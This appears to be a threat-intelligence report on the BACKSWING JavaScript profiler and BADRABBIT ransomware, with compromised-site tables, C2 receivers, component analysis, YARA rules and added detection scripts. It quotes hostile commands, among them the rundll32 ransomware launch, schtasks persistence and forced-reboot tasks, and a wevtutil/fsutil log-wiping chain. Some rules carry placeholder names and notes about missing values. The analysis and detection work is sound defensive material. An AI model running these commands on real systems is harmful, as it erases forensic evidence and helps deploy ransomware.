BACKSWING, a malicious JavaScript profiling framework, was deployed to
at least 54 legitimate sites starting as early as September 2016.  A
handful of these sites were later used to redirect to BADRABBIT
distribution URLs.

FireEye iSIGHT Intelligence tracks two distinct versions of BACKSWING
that contain the same functionality, but differ in their code styles.
We consider BACKSWING a generic container used to select attributes of
the current browsing session (User-Agent, HTTP Referrer, Cookies, and
the current domain). This information is then relayed to a “C2”
sometimes referred to as a “receiver.” If the receiver is online,
the server returns a unique JSON blob to the caller which is then
parsed by the BACKSWING code (Figure 1).

Figure 1: BACKSWING Reply

BACKSWING anticipates the JSON blob to have two fields,
“InjectionType” (expected to be an integer) and “InjectionString”
(expected to be a string containing HTML content). BACKSWING version 1
(Figure 2) explicitly handles the value of “InjectionType” via two
code paths:

  • If InjectionType == 1 (redirect browser to URL)
  • If InjectionType != 1 (render HTML into the DOM)

Figure 2: Backswing Version 1

In Version 2 (Figure 3), BACKSWING retains similar logic, but
generalizes the InjectionString to be handled strictly to render the
reply into the DOM.

Figure 3: BACKSWING Version 2

Version 1:

  • FireEye observed the first version of BACKSWING in late 2016
    on websites belonging to a Czech Republic hospitality organization
    in addition to a government website in Montenegro. Turkish-tourism
    websites were also injected with this profiler.
  • v1 was commonly injected in cleartext to affected websites, but over
    time, actors began to obfuscate the code using the open-source
    Dean-Edwards Packer and injected it into legitimate JavaScript
    resources on affected websites. Figure 4 shows the injection
  • Beginning in May 2017, FireEye observed a number of
    Ukrainian websites compromised with BACKSWING v1, and in June 2017,
    began to see content returned from BACKSWING receivers.
  • In late June 2017, BACKSWING servers returned an HTML div element with
    two distinct identifiers. When decoded, BACKSWING v1 embedded two
    div elements within the DOM with values of
    07a06a96-3345-43f2-afe1-2a70d951f50a and
    9b142ec2-1fdb-4790-b48c-ffdf22911104. No additional content was
    observed in these replies.

Figure 4: BACKSWING Injection Content

Version 2:

  • The earliest that FireEye observed BACKSWING v2 occurred on
    Oct. 5, 2017 across multiple websites that previously hosted
  • BACKSWING v2 was predominantly injected into
    legitimate JavaScript resources hosted on affected websites;
    however, some instances were injected into the sites’ main
  • FireEye observed limited instances in which websites hosting
    this version were also implicated in suspected BADRABBIT infection
    chains (detailed in Table 1).

Malicious profilers allow attackers to obtain more information about
potential victims before deploying payloads (in this case, the
BADRABBIT “flash update” dropper). While FireEye has not directly
observed BACKSWING delivering BADRABBIT, BACKSWING was observed on
multiple websites that were seen referring FireEye customers to
1dnscontrol[.]com, which hosted the BADRABBIT dropper.

Table 1 highlights the legitimate sites hosting BACKSWING that were
also used as HTTP referrers for BADRABBIT payload distribution.

Compromised Website    BACKSWING Receiver                                BACKSWING Version   Observed BADRABBIT Redirect
blog.fontanka[.]ru     Not Available                                     Not Available       1dnscontrol[.]com
[.]jp                  http://185.149.120[.]3/scholargoogle/             v2                  1dnscontrol[.]com
www.fontanka[.]ru      http://185.149.120[.]3/scholargoogle/             v2                  1dnscontrol[.]com
www.mediaport[.]ua     http://172.97.69[.]79/i/                          v1                  1dnscontrol[.]com
www.mediaport[.]ua     http://185.149.120[.]3/scholargoogle/             v2                  1dnscontrol[.]com
www.smetkoplan[.]com   http://172.97.69[.]79/i/                          v1                  1dnscontrol[.]com
www.smetkoplan[.]com   http://38.84.134[.]15/Core/Engine/Index/default   v1                  1dnscontrol[.]com
www.smetkoplan[.]com   http://185.149.120[.]3/scholargoogle/             v2                  1dnscontrol[.]com

Table 1: Sites hosting BACKSWING profilers that
redirected users to a BADRABBIT download site
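To make the Table 1 chain concrete from the defender's side, here is an added example (not FireEye's code) that walks constructed proxy log lines and ties a client's call to one of the receivers above to its later fetch from 1dnscontrol[.]com via the same referring site. The log format, client addresses and dropper path are assumptions; the receiver URLs and host are taken from Table 1.

```python
"""Tie BACKSWING receiver calls to BADRABBIT fetches in proxy logs (added example)."""
from collections import defaultdict
from urllib.parse import urlparse

# Receiver URLs and the dropper host from Table 1 of this post, kept defanged as printed.
RECEIVERS = {
    "http://185.149.120[.]3/scholargoogle/": "v2",
    "http://172.97.69[.]79/i/": "v1",
    "http://38.84.134[.]15/Core/Engine/Index/default": "v1",
}
BADRABBIT_HOST = "1dnscontrol[.]com"

def refang(ioc):
    """Restore '[.]' to '.' so the printed indicators match real log fields."""
    return ioc.replace("[.]", ".")

def parse(line):
    """Constructed log format '<time> <client> <url> <referrer|->' (not a real product's format)."""
    ts, client, url, ref = line.split()
    return {"ts": ts, "client": client, "url": url, "ref": None if ref == "-" else ref}

def host_of(url):
    return urlparse(url).hostname if url else None

def analyze(lines):
    """Return two lists: receiver beacons as (client, referring site, version) and
    BADRABBIT fetches as (client, referring site, profiled_first), where
    profiled_first is True when that client already called a receiver from that site."""
    profiled = defaultdict(set)   # client -> sites from which it was sent to a receiver
    beacons, drops = [], []
    for rec in map(parse, lines):
        site = host_of(rec["ref"])
        for receiver, version in RECEIVERS.items():
            if rec["url"].startswith(refang(receiver)):
                profiled[rec["client"]].add(site)
                beacons.append((rec["client"], site, version))
        if host_of(rec["url"]) == refang(BADRABBIT_HOST):
            drops.append((rec["client"], site, site in profiled[rec["client"]]))
    return beacons, drops

# Constructed lines modelled on the www.fontanka[.]ru row of Table 1; client
# addresses and the dropper path are made up (the post gives only the host).
SAMPLE_LOG = [
    "10:00:01 10.0.0.5 http://www.fontanka.ru/ -",
    "10:00:02 10.0.0.5 http://185.149.120.3/scholargoogle/ http://www.fontanka.ru/",
    "10:00:03 10.0.0.5 http://1dnscontrol.com/placeholder-dropper-path http://www.fontanka.ru/",
    "10:05:00 10.0.0.9 http://1dnscontrol.com/placeholder-dropper-path -",
]

if __name__ == "__main__":
    beacons, drops = analyze(SAMPLE_LOG)
    print("receiver beacons:", beacons)
    print("BADRABBIT fetches (client, site, profiled first):", drops)
```

A fetch flagged with profiled_first set is the full profiler-then-dropper sequence; one without it is still worth triage, since the post notes BACKSWING was not seen delivering BADRABBIT directly.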

The compromised websites listed in Table 1 demonstrate one of the
first times we have observed the potential weaponization of
BACKSWING. FireEye is tracking a growing number of legitimate websites
that also host BACKSWING, underscoring a considerable footprint the
actors could leverage in future attacks. Table 2 provides a list of
sites also compromised with BACKSWING.


Table 2: Additional sites hosting BACKSWING
profilers and associated receivers

The distribution of sites compromised with BACKSWING suggests a
motivation other than financial gain. FireEye observed this framework
on compromised Turkish sites and Montenegrin sites over the past year.
We observed a spike of BACKSWING instances on Ukrainian sites, with a
significant increase in May 2017. While some sites hosting BACKSWING
do not have a clear strategic link, the pattern of deployment raises
the possibility of a strategic sponsor with specific regional interests.

BADRABBIT Components

BADRABBIT is made up of several components, as described in Figure 5.

Figure 5: BADRABBIT components

Install_flashPlayer.exe (MD5: FBBDC39AF1139AEBBA4DA004475E8839)

The install_flashplayer.exe payload drops infpub.dat (MD5:
C4F26ED277B51EF45FA180BE597D96E8) to the C:\Windows directory and
executes it using rundll32.exe with the argument
C:\Windows\infpub.dat,#1 15. This execution format mirrors that of EternalPetya.

infpub.dat (MD5: 1D724F95C61F1055F0D02C2154BBCCD3)

The infpub.dat binary is the primary ransomware component
responsible for dropping and executing the additional components shown
in the BADRABBIT Components section. An embedded RSA-2048 key
facilitates the encryption process, which uses an AES-128 key to
encrypt files. The extensions listed below are targeted for encryption:

The following directories are ignored during the encryption process:

  • Windows
  • Program Files
  • ProgramData
  • AppData

The malware writes its ransom message to the root of each affected
drive with the filename Readme.txt.

The infpub.dat is capable of performing lateral movement via WMI or
SMB. Harvested credentials provided by an embedded Mimikatz executable
facilitate the infection of other systems on the network. The malware
contains lists of common usernames, passwords, and named pipes that it
can use to brute-force other credentials for lateral movement.

If one of four Dr.Web antivirus processes is present on the system,
file encryption is not performed. If the malware is executed with the
“-f” command line argument, credential theft and lateral movement are bypassed.

dispci.exe (MD5: B14D8FAF7F0CBCFAD051CEFE5F39645F)

The dispci.exe binary interacts with the DiskCryptor driver
(cscc.dat) to install the malicious bootloader. If one of three McAfee
antivirus processes is running on the system, dispci.exe is written to
the %ALLUSERSPROFILE% directory; otherwise, it is written to
C:\Windows. The sample is executed on system start using a scheduled
task named rhaegal.

cscc.dat (MD5s: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A)

A 32 or 64-bit DiskCryptor
driver named cscc.dat facilitates disk encryption. It is installed in
the C:\Windows directory as a kernel driver service named cscc.

Mimikatz usage (MD5s: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977)

A 32 or 64-bit Mimikatz variant is written to a temporary file (e.g.,
651D.tmp) in the C:\Windows directory and executed by passing a named
pipe string (e.g., \\.\pipe\{8A93FA32-1B7A-4E2F-AAD2-76A095F261DC}) as
an argument. Harvested credentials are passed back to infpub.dat via
the named pipe, similar to EternalPetya.

BADRABBIT Compared to EternalPetya

The infpub.dat contains a checksum algorithm like the one used in
EternalPetya. However, the initial checksum value differs slightly:
0x87654321 in infpub.dat, 0x12345678 in EternalPetya. infpub.dat also
supports the same command line arguments as EternalPetya with the
addition of the “-f” argument, which bypasses the malware’s credential
theft and lateral movement capabilities.

Like EternalPetya, infpub.dat determines if a specific file exists
on the system and will exit if found. The file in this case is
cscc.dat. infpub.dat contains a wmic.exe lateral movement capability,
but unlike EternalPetya, does not contain a PSEXEC binary used to
perform lateral movement.

Both samples utilize the same series of wevtutil and fsutil commands
to perform anti-forensics:

wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D %SYSTEMDRIVE%
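The command lines in the component descriptions above map directly to host-level detections. The following added example (not FireEye's code) runs simple checks for those BADRABBIT behaviours over constructed process-creation events: rundll32 loading a file by export ordinal, the rhaegal/drogon task creation, the forced reboot, and the wevtutil/fsutil anti-forensics chain. The event shape, the /TR target for rhaegal and the /ST time are assumptions.

```python
"""Flag BADRABBIT host activity in process-creation events (added example)."""
import re

# Constructed events in the shape of a process-creation log; command lines follow
# the BADRABBIT IOC section of this post, the rhaegal /TR target and /ST time are made up.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\system32\rundll32.exe",
     "cmd": r"C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15"},
    {"image": r"C:\Windows\system32\cmd.exe",
     "cmd": r'cmd.exe /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\dispci.exe -id 1234"'},
    {"image": r"C:\Windows\system32\cmd.exe",
     "cmd": r'cmd.exe /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 01:23:00'},
    {"image": r"C:\Windows\system32\cmd.exe",
     "cmd": r"cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:"},
    {"image": r"C:\Windows\system32\rundll32.exe",   # benign control: named export, no ordinal
     "cmd": r"rundll32.exe shell32.dll,Control_RunDLL"},
]

# rundll32 loading a file by export ordinal ("...,#1"), the way infpub.dat is launched.
RUNDLL32_ORDINAL = re.compile(r"rundll32(?:\.exe)?\s+\S+\.(?:dat|dll),#\d+", re.I)
# Task names used by BADRABBIT in this post and in the dispci YARA rule (viserion_%u).
TASK_NAMES = {"rhaegal", "drogon", "viserion"}

def detect(event):
    """Return the list of BADRABBIT-style behaviours seen in one event's command line."""
    cmd, hits = event["cmd"], []
    if RUNDLL32_ORDINAL.search(cmd):
        hits.append("rundll32_ordinal_arg")
    task = re.search(r"schtasks\s+/Create\b.*?/TN\s+(\S+)", cmd, re.I)
    if task and task.group(1).lower().split("_")[0] in TASK_NAMES:
        hits.append("badrabbit_task_name")
    if task and re.search(r"shutdown(?:\.exe)?\s+/r\s+/t\s+0\s+/f", cmd, re.I):
        hits.append("forced_reboot_task")
    if len(re.findall(r"wevtutil\s+cl\s+\w+", cmd, re.I)) >= 2:   # mass log clearing
        hits.append("wevtutil_clear_log")
    if re.search(r"fsutil\s+usn\s+deletejournal", cmd, re.I):
        hits.append("usn_journal_delete")
    return hits

def scan(events):
    """Map each suspicious command line to its hits; clean events are omitted."""
    return {e["cmd"]: detect(e) for e in events if detect(e)}

if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS).items():
        print(hits, "<-", cmd)
```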

FireEye Detections

Product               Detection Names
NX, EX, AX, FX, ETP   malware.binary.exe, Trojan.Ransomware.MVX, Exploit.PossibleWaterhole.BACKSWING
                      Created], WINDOWS METHODOLOGY [Service Installation], WINDOWS Ordinal Arg], WINDOWS METHODOLOGY [Wevtutil Clear-log], METHODOLOGY [Multiple Admin Share Failures]

We would like to thank Edward Fjellskål for his assistance with
research for this blog.


File: Install_flashPlayer.exe
Hash: FBBDC39AF1139AEBBA4DA004475E8839
Description: Drops infpub.dat

File: infpub.dat
Hash: 1D724F95C61F1055F0D02C2154BBCCD3
Description: Primary ransomware component

File: dispci.exe
Hash: B14D8FAF7F0CBCFAD051CEFE5F39645F
Description: Interacts with the DiskCryptor driver (cscc.dat) to
install the malicious bootloader, responsible for file decryption.

File: cscc.dat
Hash: B4E6D97DAFD9224ED9A547D52C26CE02 or EDB72F4A46C39452D1A5414F7D26454A
Description: 32 or 64-bit DiskCryptor driver

File: .tmp
Hash: 37945C44A897AA42A66ADCAB68F560E0 or 347AC3B6B791054DE3E5720A7144A977
Description: 32 or 64-bit Mimikatz variant

File: Readme.txt
Hash: Variable
Description: Ransom note

Command: system32\rundll32.exe C:\Windows\infpub.dat,#1 15
Description: Runs the primary ransomware component of BADRABBIT. Note
that “15” is the default value present in the malware and may be
altered by specifying a different value on the command line when executing install_flashplayer.exe.

Command: %COMSPEC% /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "<%COMSPEC%> /C Start "" "" -id
Description: Creates the rhaegal scheduled task

Command: %COMSPEC% /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "%WINDIR%\system32\shutdown.exe /r /t 0 /f" /ST
Description: Creates the drogon scheduled task

Command: %COMSPEC% /c schtasks /Delete /F /TN drogon
Description: Deletes the drogon scheduled task

Command: %COMSPEC% /c wswevtutil cl Setup & wswevtutil cl System & wswevtutil cl Security & wswevtutil cl Application & fsutil usn deletejournal /D :
Description: Anti-forensics

Scheduled Task Name: rhaegal
Scheduled Task Run: "<%COMSPEC%> /C Start "" "" -id && exit"
Description: Bootloader interaction

Scheduled Task Name: drogon
Scheduled Task Run: "%WINDIR%\system32\shutdown.exe /r /t 0 /f"
Description: Forces a reboot

Service Name: cscc
Service Display Name: Windows Client Side
Caching DDriver
Service Binary Path: cscc.dat

Embedded usernames from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
other user
Embedded passwords from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)
Embedded pipe names from infpub.dat (1D724F95C61F1055F0D02C2154BBCCD3)

Yara Rules

rule FE_Hunting_BADRABBIT {
  meta:
    // the start of the author value is cut off in the source text
    author = "@TekDefense & nicholas.carr @itsreallynick"
    // md5 value not present in the source text
  strings:
    // Messages
    $msg1 = "Incorrect password" nocase ascii wide
    $msg2 = "Oops! Your files have been encrypted." ascii wide
    $msg3 = "If you see this text, your files are no longer accessible." ascii wide
    $msg4 = "You might have been looking for a way to recover your files." ascii wide
    $msg5 = "Don't waste your time. No one will be able to recover them without our" ascii wide
    $msg6 = "Visit our web service at" ascii wide
    $msg7 = "Your personal installation key#1:" ascii
    $msg8 = "Run DECRYPT app at your desktop after system boot" ascii wide
    $msg9 = "Password#1" nocase ascii wide
    $msg10 = "caforssztxqzf2nm.onion" nocase ascii
    $msg11 = /partition (unbootable|not (found|mounted))/ nocase ascii wide

    // File references (backslashes escaped as YARA requires)
    $fref1 = "C:\\Windows\\cscc.dat" nocase ascii wide
    $fref2 = "\\\\.\\dcrypt" nocase ascii wide
    $fref3 = "Readme.txt" ascii wide
    $fref4 = "\\Desktop\\DECRYPT.lnk" nocase ascii
    $fref5 = "dispci.exe" nocase ascii wide
    $fref6 = "C:\\Windows\\infpub.dat" nocase ascii wide

    // Metadata strings
    // $meta1 value is missing from the source text; omitted so the rule compiles
    $meta2 = "dispci.exe" nocase ascii wide
    $meta3 = "GrayWorm" ascii wide
    $meta4 = "viserion" nocase ascii wide

    // Commands
    $com1 = "ComSpec" ascii
    $com2 = "\\cmd.exe" nocase ascii
    $com3 = "schtasks /Create" nocase ascii wide
    $com4 = "schtasks /Delete /F /TN %ws" nocase ascii wide
  condition:
    (uint16(0) == 0x5A4D)
    and
    (
      (8 of ($msg*) and 3 of ($fref*) and 2 of ($com*))
      or
      (all of ($meta*) and 8 of ($msg*))
    )
}

// Rule name not present in the source text; placeholder name used. Dropper (install_flashplayer.exe).
rule FE_BADRABBIT_rule2_PLACEHOLDER {
  meta:
    // author and md5 values are not present in the source text
    rev = 1
  strings:
    $api1 = "GetSystemDirectoryW" fullword
    $api2 = "GetModuleFileNameW" fullword
    $dropped_dll = "infpub.dat" ascii fullword
    $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
    $extract_seq = { 68 ?? ?? ?? ?? 8D 95 E4 F9 FF FF 52 FF 15 ?? ?? ?? ?? 85 C0 0F 84 C4 00 00 00 8D 85 A8 ED FF FF 50 8D 8D AC ED FF FF E8 ?? ?? ?? ?? 85 C0 0F 84 AA 00 00 00 }
  condition:
    (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
}

// Rule name not present in the source text; placeholder name used. Primary component (infpub.dat).
rule FE_BADRABBIT_rule3_PLACEHOLDER {
  meta:
    author = "muhammad.umair"
    md5 = "1d724f95c61f1055f0d02c2154bbccd3"
    rev = 1
  strings:
    $api1 = "WNetAddConnection2W" fullword
    $api2 = "CredEnumerateW" fullword
    $api3 = "DuplicateTokenEx" fullword
    $api4 = "GetIpNetTable"
    $del_tasks = "schtasks /Delete /F /TN drogon" ascii fullword wide
    $dropped_driver = "cscc.dat" ascii fullword wide
    $exec_fmt_str = "%ws C:\\Windows\\%ws,#1 %ws" ascii fullword wide
    $iter_encrypt = { 8D 44 24 3C 50 FF 15 ?? ?? ?? ?? 8D 4C 24 3C 8D 51 02 66 8B 31 83 C1 02 66 3B F7 75 F5 2B CA D1 F9 8D 4C 4C 3C 3B C1 74 07 E8 ?? ?? ?? ?? }
    $share_fmt_str = "\\\\%ws\\admin$\\%ws" ascii fullword wide
  condition:
    (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
}

// Rule name not present in the source text; placeholder name used. Embedded Mimikatz variant.
rule FE_BADRABBIT_rule4_PLACEHOLDER {
  meta:
    // author and md5 values are not present in the source text
    rev = 1
  strings:
    $api1 = "WriteProcessMemory" fullword
    $api2 = "SetSecurityDescriptorDacl" fullword
    $api_str1 = "BCryptDecrypt" ascii fullword
    $mimi_str = "CredentialKeys" ascii fullword wide
    $wait_pipe_seq = { FF 15 ?? ?? ?? ?? 85 C0 74 63 55 BD B8 0B 00 00 57 57 6A 03 8D 44 24 1C 50 57 68 00 00 00 C0 FF 74 24 38 4B FF 15 ?? ?? ?? ?? 8B F0 83 FE FF 75 3B }
  condition:
    (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 500KB and all of them
}

// Rule name not present in the source text; placeholder name used. Disk encryption component (dispci.exe).
rule FE_BADRABBIT_rule5_PLACEHOLDER {
  meta:
    // author and md5 values are not present in the source text
    rev = 1
  strings:
    $api1 = "CryptAcquireContextW" fullword
    $api2 = "CryptEncrypt" fullword
    $api3 = "NetWkstaGetInfo" fullword
    $decrypt_seq = { 89 5D EC 78 10 7F 07 3D 00 00 00 01 76 07 B8 00 00 00 01 EB 07 C7 45 EC 01 00 00 00 53 50 53 6A 04 53 8B F8 56 89 45 FC 89 7D E8 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 5F }
    $msg1 = "Disk decryption progress..." ascii fullword wide
    $task_fmt_str = "schtasks /Create /SC ONCE /TN viserion_%u /RU SYSTEM /TR \"%ws\" /ST %02d:%02d:00" ascii fullword wide
    $tok1 = "\\\\.\\dcrypt" ascii fullword wide
    $tok2 = "C:\\Windows\\cscc.dat" ascii fullword
  condition:
    (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize < 150KB and all of them
}

Author: Barry Vengerik